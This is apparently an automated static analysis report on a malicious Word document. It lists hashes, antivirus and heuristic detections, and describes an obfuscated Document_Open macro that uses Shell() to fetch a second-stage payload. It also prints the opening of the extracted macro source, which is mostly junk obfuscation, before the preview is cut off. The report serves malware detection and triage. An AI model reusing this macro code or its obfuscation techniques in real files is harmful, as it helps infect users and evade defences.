Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 99eb1d90eb5f0d01…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 212.5 KB
Created: 2018-04-13 12:19:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 16ba8f5d604b4b9a366ae2d5b2107e68
SHA-1: 878f05a0ddc78db92cd844b5d13be93e7b25f343
SHA-256: 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains heavily obfuscated VBA macros, including an auto-exec loader in the Document_Open macro. Critical heuristics indicate the use of Shell() calls, which are likely used to execute arbitrary commands. The VBA code appears to be designed to download and execute a second-stage payload, though the exact URL or command is obfuscated.

Heuristics (7)

  • ClamAV: Doc.Malware.Chronos-6897935-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 55040 bytes
SHA-256: a4564577d986a60cc198637beef5f22eb9b48d2b7f830bad03591dded325bb5c

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function zxOInozC() As String
    FuwkI = Right("bzmZkcyxico", 5)
    DRcvPe = Space(9)
    KrhJJsT = Mid("LMVofAsyucLphOZo", 1, 7)
    buix = LTrim("BatTuwXghQaiSmPOCGD")
    LwSt = Space(8)
    AyyF = LTrim("hZxZofdppdcZaH")
    bzvKd = StrConv("pPWGYgALyTn", 0)
    Jhczuz = StrReverse("xXHaYVlayCuuZkjCi")
    peeIley = Right("PtYwReVssPhzLPlAQ", 2)
    ubftsy = Space(6)
    sqnB = Space(5)
    UJZet = Mid("afsEZJPlgBksslOkT", 1, 6)
    JljTw = Mid("LxuUMtRhEi", 1, 6)
    qjtDWm = Replace("EjqkHRQQuJmcG", "Ejqk", "iYybEI")
    gkoy = RTrim("brfwKlGODjFdARK")
    dcbC = RTrim("LfYKOwiKAUSmpDepSVw")
    yTVaoy = UCase("fHLXccfzZzXKfti")
    PbGu = Space(9)
    vJOY = StrReverse("RTymuoQhKLOsiVw")
    ALSnWPy = Right("aOpeQFOiRusI", 5)
    wgsZLF = RTrim("KwCBIBFruDzZVa")
    uGAJ = Replace("aEvAUjWHepmHC", "aEvA", "OwLcZz")
    If STXicg = 49 + 6430 Then
        trpjb = Replace("bQmhHhzffXbLvUzUMH", "bQmh", "tgnA")
        trpjb = StrReverse("bQmhHhzffXbLvUzUMH")
    End If
    XOOI = Replace("VUhmkFlrmFXCjIU", "VUhm", "DsprfPA")
    eOOD = RTrim("hKWzsaGGjxjIvWdDsyG")
    KRodo = Mid("lYbYdjIqrMJcc", 2, 6)
    FiksYIm = RTrim("GcaXtiWDGWjI")
    angl = LTrim("jWenprXivEbOQpHXGi")
    fnYWTAK = StrConv("zIwMmSDtcolfX", 0)
    gIUUSjT = UCase("MnMvxIVpgC")
    IPbxlP = StrReverse("TxobfMaqJgrCRprzyE")
    UUvzVRn = Left("RhWiCpAGYLhiYSKIoz", 6)
    PctdT = RTrim("yBpGOZkZdKJzbpk")
    XZYBIn = UCase("VyqZCEdEkPBE")
    UIot = Left("xfzrIgnpWDvZpPel", 5)
    XYiE = StrReverse("MngsiDRkIbpfV")
    tPQGAo = Mid("MqEUDadWJQbjeVAvHT", 1, 5)
    ZzRHB = Mid("HIbDcWbpnOzqG", 1, 6)
    ldMt = Replace("HoMdaySFCwYMP", "HoMd", "HIuKI")
    TxFdwzu = Right("fpYoBnrzvdYhKDS", 4)
    lheVT = Space(5)
    Rnci = Left("fKFgOMBKWqen", 4)
    ycFVnn = Replace("FySkBVIBuigGkMrW", "FySk", "GOxvM")
    EhOphG = LTrim("cwEGOdLgBVvwHLqQHFB")
    gVIDF = UCase("wovLMbkeoH")
    bnqE = Right("ByEYPSGjgkfwbwDIdP", 2)
    hCHXy = UCase("kZcdGEAdiXodhrF")
    KgyyY = Space(7)
    gBeRz = Right("wqzcMaesnaSmWMFrb", 6)
    PVhqy = Mid("efERzRrXMsldofqFCZ", 1, 5)
    Moan = StrConv("lacJJeWwzoXbB", 0)
    MGyC = StrReverse("YJTHAlgWTQqMz")
    ljczTjq = StrReverse("gypSMHzickxOQ")
    If UUOTiP = 145 + 330 Then
        czLgX = Replace("cgTGdHJsAlncLsWD", "cgT", "yZWMOqR")
        czLgX = StrReverse("cgTGdHJsAlncLsWD")
        dqKKH = Replace("yUmxLtHeXAnXYsIWwfm", "yUmx", "hGvvB")
        dqKKH = StrReverse("yUmxLtHeXAnXYsIWwfm")
    End If
    ndrF = Space(5)
    nIfL = RTrim("LBjbzEXlPRQZnClIBo")
    uAsDe = StrConv("EsdqjaLzYqziXdzoS", 0)
    YcWBlVF = StrConv("wLIfwKzeHZhpMofvIUS", 0)
    ivcm = Space(7)
    tQmfkw = LTrim("sSCJhqdMDKtWHgU")
    If jVRbTH = 66 + 16 Then
        hHJPZ = Replace("SiyePCkxrmQphPDMpMv", "Siye", "ZGmKhbP")
        hHJPZ = StrReverse("SiyePCkxrmQphPDMpMv")
        GSAEt = Replace("YiDhhCOUvwunBX", "YiDh", "TauX")
        GSAEt = StrReverse("YiDhhCOUvwunBX")
    End If
    LhFpby = LTrim("ffmgPfupTcpEXjgshW")
    OFHIJDZ = Mid("nqHUpJrcgU", 1, 7)
    AxETG = Left("goYTFEeaXdWKFsCdVW", 3)
    EMMgHzv = Space(6)
    CxfI = Mid("QYdjDtBccK", 2, 5)
    ZfPa = UCase("EKgGfibzKQAyxf")
    If MxdYLb = 144 + 2801 Then
        GhwlQ = Replace("zHEnfEqLwciCeqzlf", "zHE", "VksQr")
        GhwlQ = StrReverse("zHEnfEqLwciCeqzlf")
    End If
    ELQRY = UCase("IOZcDlDdJTmZavVlzB")
    If qKSFrS = 37 + 7671 Then
        TEOwg = Replace("PiiHqTOBjrtz", "Pii", "dfUEcu")
        TEOwg = StrReverse("PiiHqTOBjrtz")
    End If
    FjCmPJ = Right("zrtmgbuTxnVrrMs", 5)
    VqiueF = Right("hpHSgEfpoEWD", 6)
    If oZzlmA = 86 + 5507 Then
        MyJRa = Replace("DIWrrpUHVY", "DIWr", "PAlXrz")
        MyJRa = StrReverse("DIWrrpUHVY")
    End 
... (truncated)